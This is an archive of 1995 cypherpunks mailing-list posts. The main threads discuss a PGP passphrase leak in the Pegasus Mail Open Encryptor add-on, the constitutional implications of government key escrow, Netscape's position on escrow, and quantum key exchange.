> > if I can wire in $100 to the hidden account.  Anyone have any good
> > ideas about how to find an ABA number?
> 
> Depends on what information you have. You looking for a Bank Name/ABA #
> lookup, or the other way around?

Wiring it successfully is one thing.  Escaping the exception report at 
FinCEN and the Fed is quite another.

Just an inspired guess...

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sat, 9 Dec 95 19:42:56 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <34756653250@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  9 Dec 95 at 18:29, Siberia wrote:

: Okay, here's how I understand things with PGP and Pegasus.  You have two
: options with Pegasus depending on the set-up options you choose.  You can
: either send upon completion of your out-going email, or you can have your mail
: queued until you press the send out-going mail button.  The actual PGP process
: does not occur until you actually send the mail.  So the answer would be: 
: don't queue your mail.

	That's not really a solution in the Windows environment, if you have a 
swap file, you never know what gets written out to it.  The solution is 
run w/o a swap file or run an encrypted file system.  I run an 
encrypted file system.

	Pegasus will indeed save your key with your message in the outgoing 
queue.  This is a problem with the design of pegasus, not with the 
design of the add on encryptor.  
  
: 
: On  9 Dec 95 at 16:24, Jon Lasser wrote:
: 
: > On Sat, 9 Dec 1995 anonymous-remailer@shell.portal.com wrote:
: > 
: > > I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  
: > > I found that when you sign a message and queue it, it stores your password
: > > in the clear on the hard drive. Apparently
: > > it doesn't sign or encrypt the message until just before
: > > transmitting it.  So it stores your PGP private key password
: > > with the message until it sends it.
: > 
: > Can anyone verify this?
: > 
: > Kinda brings new meaning to the term "Open Encryptor," huh?
: > 
: > Jon
: > ------------------------------------------------------------------------------
: > Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
: >           Visit my home page at http://www.goucher.edu/~jlasser/
: >   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
: > 
: > 
: > 
: 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMpJNDUjeCeeebC9AQFsdAf+OY1FPLqSbHYyB+MnUl56dau9gFouoLKf
y5UDCE9d4w2ndo6iKOGk7UzfTR3vYQaJmfEI2og+37hi2au01mHm/T0IAUOFYOYr
owr6Xn8TZ8vHPOEe71LYRdad60ZdlkPr7H3Nxc9l7O9ueZp0SAM4xPMZmMPUkb8V
d4j2m1kbLOHHNmqFmHWjxXvKLaowF/38cgbV9VuDFatySZuM9TdaVQEbazum0uDE
LOgUzrQqs2GqlDOB1WMkvJv947SPHhjCJQTcygtS6SoGJv6AzLCL0LtstmBnCOgI
zRIrX5wgFSp49BRdmE0/xp62+TuaGCZ6ml8iW/zS9ab7GSeOA2Qs6Q==
=GINp
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Animals can be driven crazy by placing too many in too small a pen.
Homo sapiens is the only animal that voluntarily does this to himself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Dec 95 21:17:12 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Netscape announces position against GAK
In-Reply-To: <199512100446.UAA00146@blob.best.net>
Message-ID: <Pine.SUN.3.91.951210001729.28482A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, James A. Donald wrote:

> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
> >Credit where credit is due.
> >
> >I for one am satisfied--and even pleased--with the Netscape position on GAK.
> 
> Well I for one, am seriously unsatisfied, but it is not so bad as
> to merit a campaign against Netscape.

I think it's a good start.  I would like to see how much effort after 
this really pans out.  Doesn't take much to put out a policy statement.  
Takes a lot to follow it through.

>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sat, 9 Dec 95 16:47:06 PST
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
In-Reply-To: <199512092259.QAA11480@snoopy.vetmed.auburn.edu>
Message-ID: <30ca2fb5.20633389@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 16:59:13 -0600 (CST), Frank Stuart
<fstuart@vetmed.auburn.edu> wrote:



>To avoid just saying "me too", I'll throw out another idea on making the U.S.
>version of Netscape available to U.S. users over the Internet.  How about a
>phone number to call to get an access id of some sort that can be used to
>FTP the software.  When you call the number, you can use caller-id to verify
>that the person is calling from within the U.S.  You could set up a BBS-type
>system to do this automatically, or make the phone number a 900 number and
>charge a few dollars to cover your costs.  You could also set up the access
>id so that it can only be used once.

Couldn't caller ID be fooled by call forwarding?  I am anything but an
expert on caller ID, but this seems like a possible loophole.  This
would cause the same kind of problem that is holding up placing the
U.S. version on the Web.  


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 22:00:33 PST
To: cme@acm.org
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <9512072127.AA28756@tis.com>
Message-ID: <Pine.BSF.3.91.951210005729.18670B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995 cme@acm.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST)
> >From: Black Unicorn <unicorn@polaris.mindport.net>
> >Subject: Re: Netscape gives in to key escrow
> 
> >An individual has no legitimate expectation of privacy in the encryption 
> >numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
> >those numbers to the government when he purchased the software.
> 
> It could be even worse.  I was on a panel last year with Scott Charney (sp?)
> (I believe from DoJ) during which he commented that if you give your secret
> key to anyone -- e.g., your own company -- then you have given up the
> presumption of privacy.  That leaves the police open to get that secret
> without a warrant.  This claim should be checked by a real lawyer.
>

I suspect that Charney was referring to the fact that the third party 
keyholder could be compelled to surrender your key under subpoena without 
having any right against self-incrimination invoked.  
And in that, of course, he was correct.  (But if you give it to your 
lawyer, for example, the communication is privileged ...).

EBD
 
> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 22:27:59 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951208035312.18878E-100000-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951210012418.18670C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Black Unicorn wrote:

> On Thu, 7 Dec 1995, Jeff Weinstein wrote:
> 
> > Black Unicorn wrote:
> > > 
> > > On Thu, 7 Dec 1995, sameer wrote:
> > > 
> >   How about if Bob had a contractual agreement with Alice to keep his
> > key secret?
> 
> Then as a defense attorney, I would argue that Bob had an obvious 
> expectation of privacy with Alice, and that the fact that he relayed this 
> key to Alice only under those circumstances represents a definite 
> expression of his intent to keep the key private, thus triggering 4th 
> amendment protections.  My view is that this would be a very strong argument.

Bob's Fourth Amendment rights are not triggered by his contract with 
Alice.  Alice can be compelled to give up the key (by testimony or 
production) and giving up that key does not tend to incriminate *Alice* 
in a violation of law.  Alice can't invoke Bob's rights against 
self-incrimination for obvious reasons:  Alice isn't Bob.
^^^^
EBD


> 
> Note that this is an academic opinion, not a legal one as I am not being 
> paid.
> 
> >
> > 	--Jeff
> > 
> > -- 
> > Jeff Weinstein - Electronic Munitions Specialist
> > Netscape Communication Corporation
> > jsw@netscape.com - http://home.netscape.com/people/jsw
> > Any opinions expressed above are mine.
> 
> ---
> My preferred and soon to be permanent e-mail address: unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 22:40:16 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: Escrow expectations
In-Reply-To: <m0tO59L-000G9eC@ns.crynwr.com>
Message-ID: <Pine.BSF.3.91.951210013752.18670D-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Russell Nelson wrote:

> Duncan Frissell writes:
>  > At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:
>  > 
>  > >	"Your honor, we argue that in escrowing his keys with the US
>  > >government, the defendant should have known his communications could
>  > >be listened to, and thus has no expectation of privacy."
>  > 
>  > If Clipper were mandated you might be able to resist a prosecution for
>  > "failure to file" keys or for double encrypting your transmissions if you
>  > could prove that you were transmitting illegal messages or evidence of a
>  > crime.  Just as those who possess illegal weapons are not required to
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>  > register them (self incrimination).  You have to be sure your traffic is
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You are mistaken here.  Failure to get a permit before turning a 
semi-auto firearm into a fully-auto machine gun, for example, is illegal 
as is possessing an unregistered machine gun ...

EBD




>  > illegal though otherwise no protection.
> 
> To bring two cypherpunks threads together:
> 
> That SHIT should be FUCK no DAMN problem ANAL whatsoever in a few SEX
> months.
> 
> -russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
> Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
> 11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
> Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Dec 95 22:53:53 PST
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.BSF.3.91.951210012418.18670C-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951210013333.3178A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Brian Davis wrote:

> On Fri, 8 Dec 1995, Black Unicorn wrote:
> 
> > On Thu, 7 Dec 1995, Jeff Weinstein wrote:
> > 
> > > Black Unicorn wrote:
> > > > 
> > > > On Thu, 7 Dec 1995, sameer wrote:
> > > > 
> > >   How about if Bob had a contractual agreement with Alice to keep his
> > > key secret?
> > 
> > Then as a defense attorney, I would argue that Bob had an obvious 
> > expectation of privacy with Alice, and that the fact that he relayed this 
> > key to Alice only under those circumstances represents a definite 
> > expression of his intent to keep the key private, thus triggering 4th 
> > amendment protections.  My view is that this would be a very strong
> > argument.
> 
> Bob's Fourth Amendment rights are not triggered by his contract with 
> Alice.  Alice can be compelled to give up the key (by testimony or 
> production) and giving up that key does not tend to incriminate *Alice* 
> in a violation of law.  Alice can't invoke Bob's rights against 
> self-incrimination for obvious reasons:  Alice isn't Bob.
> ^^^^

You've taken the narrow answer I was trying to give out of context.
As for fifth amendment questions, that's another discussion entirely.  If 
this was not an error, then you have still taken the question way beyond the
narrow scope I was addressing.

I was answering only as to how the manifestation of Bob's privacy
interest might impact the argument that the key was no longer a protected 
interest according to the Smith v. Maryland ruling, and thus unprotected 
by the fourth amendment on those grounds.  (Assuming it would even be
applied to the Bob - Alice relationship in terms of crypto keys).

Your statement "Bob's Fourth Amendment rights are not triggered by his 
contract with Alice." is probably correct in the event the key is 
obtained from Alice.  It may not be if the key is obtained by electronic 
measures or otherwise without a warrant and then the argument is made 
after the fact that Bob has exerted no expectation of privacy over the 
key.  This is the key question which bears on the key escrow's 
effect on Bob's protection (Alice in that example being the escrow 
agent).  Clearly Alice in that circumstance is unlikely to give up the 
key without a warrant.  The real worry is that the authorities are given 
free rein to obtain the key by other methods from Bob, or Bob's 
communications without a warrant by the mere fact that Bob has "tendered" 
the information to Alice (the escrow agent).

Again, I'm addressing the narrow issue of voluntary surrendering of key 
information to an escrow agent and its effect on the 'third party' 
rule in Smith v. Maryland, not the eventual outcome of an exclusionary 
hearing.

> EBD 
> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sat, 9 Dec 95 23:02:34 PST
To: jwhiting@igc.apc.org
Subject: Re: The Elevator Problem
Message-ID: <9512100703.AA27209@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


There is an easy way to develop a secret key in front of any number of eves, be 
they experts or not, without the eves knowing what the key is.  Even if they 
tap your phone/comm line, etc.  There was an article in Discovery Magazine a 
couple of years ago, talking about how to use photons and their randomness as 
the perfect, uncrackable code.  Use of the photons aside, there was a key 
generation method discussed, simple, yet secure enough to work out on a tapped 
phone.  Let me root around.

Regards,
Munster.
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 23:29:07 PST
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.BSF.3.91.951210012418.18670C-100000@mercury.thepoint.net>
Message-ID: <Pine.BSF.3.91.951210022636.18670F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Brian Davis wrote:
> 
> Bob's Fourth Amendment rights are not triggered by his contract with 
        ^^^^^^
Ack.  Meant "Fifth." (Although Bob's Fourth Amendment rights are 
not triggered either.)

> Alice.  Alice can be compelled to give up the key (by testimony or 
> production) and giving up that key does not tend to incriminate *Alice* 
> in a violation of law.  Alice can't invoke Bob's rights against 
> self-incrimination for obvious reasons:  Alice isn't Bob.
> ^^^^
> EBD
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 23:32:53 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951210013333.3178A-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951210023002.18670G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Black Unicorn wrote:

> On Sun, 10 Dec 1995, Brian Davis wrote:
> 
> > On Fri, 8 Dec 1995, Black Unicorn wrote:
> > 
> > > On Thu, 7 Dec 1995, Jeff Weinstein wrote:
> > > 
> > > > Black Unicorn wrote:
> > > > > 
> > > > > On Thu, 7 Dec 1995, sameer wrote:
> > > > > 
> > > >   How about if Bob had a contractual agreement with Alice to keep his
> > > > key secret?
> > > 
> > > Then as a defense attorney, I would argue that Bob had an obvious 
> > > expectation of privacy with Alice, and that the fact that he relayed this 
> > > key to Alice only under those circumstances represents a definite 
> > > expression of his intent to keep the key private, thus triggering 4th 
> > > amendment protections.  My view is that this would be a very strong
> > > argument.
> > 
> > Bob's Fourth Amendment rights are not triggered by his contract with 
> > Alice.  Alice can be compelled to give up the key (by testimony or 
> > production) and giving up that key does not tend to incriminate *Alice* 
> > in a violation of law.  Alice can't invoke Bob's rights against 
> > self-incrimination for obvious reasons:  Alice isn't Bob.
> > ^^^^
> 
> You've taken the narrow answer I was trying to give out of context.
> As for fifth amendment questions, that's another discussion entirely.  If 
> this was not an error, then you have still taken the question way beyond the
> narrow scope I was addressing.

You are correct:  I didn't realize/remember/whatever that you were 
limiting the remarks to the narrow scope you set forth below.
And on the point you were addressing, I agree with you.

Sorry to have added the fog ...

EBD

 
> I was answering only as to how the manifestation of Bob's privacy
> interest might impact the argument that the key was no longer a protected 
> interest according to the Smith v. Maryland ruling, and thus unprotected 
> by the fourth amendment on those grounds.  (Assuming it would even be
> applied to the Bob - Alice relationship in terms of crypto keys).
> 
> Your statement "Bob's Fourth Amendment rights are not triggered by his 
> contract with Alice." is probably correct in the event the key is 
> obtained from Alice.  It may not be if the key is obtained by electronic 
> measures or otherwise without a warrant and then the argument is made 
> after the fact that Bob has exerted no expectation of privacy over the 
> key.  This is the key question which bears on the key escrow's 
> effect on Bob's protection (Alice in that example being the escrow 
> agent).  Clearly Alice in that circumstance is unlikely to give up the 
> key without a warrant.  The real worry is that the authorities are given 
> free rein to obtain the key by other methods from Bob, or Bob's 
> communications without a warrant by the mere fact that Bob has "tendered" 
> the information to Alice (the escrow agent).
> 
> Again, I'm addressing the narrow issue of voluntary surrendering of key 
> information to an escrow agent and its effect on the 'third party' 
> rule in Smith v. Maryland, not the eventual outcome of an exclusionary 
> hearing.
> 
> > EBD 
> > 
> > Not a lawyer on the Net, although I play one in real life.
> > **********************************************************
> > Flame away! I get treated worse in person every day!!
> 
> ---
> My preferred and soon to be permanent e-mail address: unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Dec 95 23:47:40 PST
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.BSF.3.91.951210023002.18670G-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951210024748.3597C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


 Brian Davis wrote:
> > 
> > > On Fri, 8 Dec 1995, Black Unicorn wrote:

> > You've taken the narrow answer I was trying to give out of context.
> > As for fifth amendment questions, that's another discussion entirely.  If 
> > this was not an error, then you have still taken the question way beyond the
> > narrow scope I was addressing.
> 
> You are correct:  I didn't realize/remember/whatever that you were 
> limiting the remarks to the narrow scope you set forth below.
> And on the point you were addressing, I agree with you.
> 
> Sorry to have added the fog ...

Not a problem
I could have been clearer.

> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 01:05:18 PST
To: cypherpunks@toad.com
Subject: Whew!
Message-ID: <199512101007.EAA23520@khijol>
MIME-Version: 1.0
Content-Type: text/plain


I just finished leafing through Schneier's "Applied Cryptography", 
second edition.  Lots of new stuff, good and very thorough coverage 
of protocols and implementations, including weaknesses and processes 
behind same.  If an idiot like me can understand this stuff (and if 
you don't believe I'm an idiot, just ask Perry), anyone can.  I 
highly recommend the book, it's an absolute bargain at $50 USD.

Should be required reading for anyone before being allowed to post 
here. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Sun, 10 Dec 95 03:10:18 PST
To: cypherpunks@toad.com
Subject: Re: GAK and self-incrimination?
Message-ID: <199512101057.AA07992@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

>Consider this hypo: I send an encrypted message to a partner in crime
>containing plans for future crimes and descriptions of past crimes. I don't
>GAK the message. The government prosecutes me under the Anti-Terrorism and
>Child Protection Act of 1997.
>
>My defense? That GAKKing the message would be tantamount to incriminating
>myself, which the Fifth Amendment protects me against.      

The Fifth protects you against *compelled* self-incrimination - in
particular, the right to be free from the "cruel trilemma" of

        o       conviction of a substantive crime, based on your
                (true) testimony
        o       conviction of perjury, for lying when asked to incriminate
                yourself
        o       contempt of court sanctions, for refusing to answer

but your hypo doesn't seem to create that forbidden situation. In
particular, you're free to simply not send the message at all. 

(this message, sent from my Windows box, isn't PGP signed. Doh. signatures
will return when the Unix box is net-functional again.)
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 10 Dec 95 00:25:37 PST
To: cypherpunks@toad.com
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512100823.DAA05954@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9512081312.A23124-0100000@unicorn.com>,
Rev. Mark Grant <mark@unicorn.com> wrote:
> 
> Exactly.. once you have an active attack set up, it's trivial, but setting
> that up is quite hard. 
> 

But before everyone pats themselves on the back, congratulating themselves
on how hard an active attack is to set up, look at

http://www.EnGarde.com/software/ipwatcher/

Yes, folks, a commercial program which mounts an active attack.

(Check out the GUI!  Click on the `Watch Mail' control!  Activate the
`Take over' button!  Whee, mom, hacking is fun!)

Active attacks may not be trivial, but they aren't exactly rocket science,
either -- and they're for sale.

- -- Dave `is capitalism the best thing since sliced bread, or what?' Wagner
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMqY/ioZzwIn1bdtAQEkGQF/WdJBqbP5HwTDxldi0UDCmP2RZAFz5p2q
cPMSoOIgkFbaBS34k4LSFPKcvegw3tJk
=Ptyf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 10 Dec 95 02:12:00 PST
To: Adam Shostack <jimbell@pacifier.com
Subject: Re: More FUD from First Virtual
Message-ID: <199512101114.FAA26720@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Adam Shostack <adam@homeport.org>
> Subject:       Re: More FUD from First Virtual
> To:            jimbell@pacifier.com (jim bell)
> Date:          Sat, 9 Dec 1995 16:51:58 -0500 (EST)
> Cc:            cypherpunks@toad.com

> jim bell wrote:
> 
> [Good points about cost of transactions deleted]
> 
> | The answer, I think, it that there would be no problem finding people to
> | take that risk in exchange for the return, ESPECIALLY if they have some
> | input into the design (level of security) of the system.  They might insist
> | on 2048-bit RSA keys, instead of 1024-bit, for example.
> 
> 	(I know it's only an example, but...)
> 
> 	Key length is not what is needed for better security; more
> solid code and better interfaces are needed.  (I might also argue for
> hardware keys that are more difficult to steal..)

Nonsense.  The code is pretty solid, the interfaces aren't very 
difficult.  What is needed is better human management of keys.  Why 
brute-force, why look for weak keys, why bother calculating how much 
safer 2047-bit keys are rather than 1024-bit keys when someone can 
look on your HD and find your secret key, when they can open your 
desk drawer and find your pass phrase or password, when they can 
guess that you used your wife's maiden name as your password?

Adam, I don't understand why you wrote nonsense in the first 
paragraph, then followed it up with textbook attacks such as:

> 	Cryptosystems fail because of bad storage of keys, coding
> mistakes, accidentally writing passphrases to disk during a swap, etc.
> Moving to 2048 bit keys is no help if you lose the key to a
> non-cryptanalytic attack.  Moving to keys with a week or day lifetimes
> might be better.  

Moving the systems which automatically issue key revocation 
certificates, and coupling that with a wide distribution system would 
be the perfect match to such a scheme.  Of course, that means that 
PGP et al. needs to be more tightly integrated into existing mail 
software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Hupp" <ahupp@primenet.com>
Date: Sun, 10 Dec 95 13:54:09 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512102154.OAA16694@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Where can you get the Open Encryptor PGP interface?

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 10 Dec 95 01:24:57 PST
To: Daniel Miskell <DMiskell@envirolink.org>
Subject: Re: The Elevator Problem
In-Reply-To: <9512100703.AA27209@envirolink.org>
Message-ID: <Pine.3.89.9512100456.A16028-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 10 Dec 1995, Daniel Miskell wrote:

> There is an easy way to develop a secret key in front of any number of eves, be 
> they experts or not, without the eves knowing what the key is.  Even if they 
> tap your phone/comm line, etc.  There was an article in Discovery Magazine a 
> couple of years ago, talking about how to use photons and their randomness as 
> the perfect, uncrackable code.  Use of the photons aside, there was a key 
> generation method discussed, simple, yet secure enough to work out on a tapped 
> phone.  Let me root around.

You must mean quantum crypto, by G. Brassard and C. Crepeau of U de Montreal.
Requires a direct fiber optic line from pt. A to B, in order to be 
secure, if I am not mistaken. Which makes it impractical for most people, 
as there are usually switches (or whatever they're called) and more than one 
line in between. Lets you use OTPs with your next-door neighbor though.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Fred Nix" <FredNix@msn.com>
Date: Sat, 9 Dec 95 22:20:46 PST
To: "'cypherpunks@toad.com>
Subject: anonymous remailer
Message-ID: <UPMAIL03.199512100623550668@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey...

   How do I gain access to the remailer?

Thanks!

Fred Nix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sun, 10 Dec 95 06:30:26 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <3521BB467F3@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Dec 95 at 12:30, Anonymous wrote:

: On  9 Dec 95 at 21:43, Jeff Hupp wrote:
: 
: > On  9 Dec 95 at 18:29, Siberia wrote:
: 
: > : Okay, here's how I understand things with PGP and Pegasus.
: > : You have two  options with Pegasus depending on the set-up
: > : options you choose.  You can either send upon completion of
: > : your out-going email, or you can have your mail queued
: > : until you press the send out-going mail button.  The actual
: > : PGP process does not occur until you actually send the
: > : mail.  So the answer would be: don't queue your mail.
: 
: > 	That's not really a solution in the Windows environment, if
: > you have a swap file, you never know what gets written out
: > to it.  The solution is run w/o a swap file or run an
: > encrypted file system.  I run an encrypted file system.
: 
: Oh, PLEASE! Do you HAVE to go and mix up two completely
: different issues? Aren't the nontechnical people trying to
: follow these things likely to be confused enough without your
: adding to that confusion? For every person who really 
: understands the technical issues there are probably a thousand 
: or ten thousand who are just trying to *use* the stuff without 
: stepping into a deep hole.
: 
: An OS swap file is one kind of hole.  What Siberia is writing 
: about is ANOTHER type of hole. If I wipe my swap file after 
: each use of my machine and don't know that Pegasus is doing 
: this, or think that because of what you wrote I'm no worse off, 
: I've been done a serious disservice.

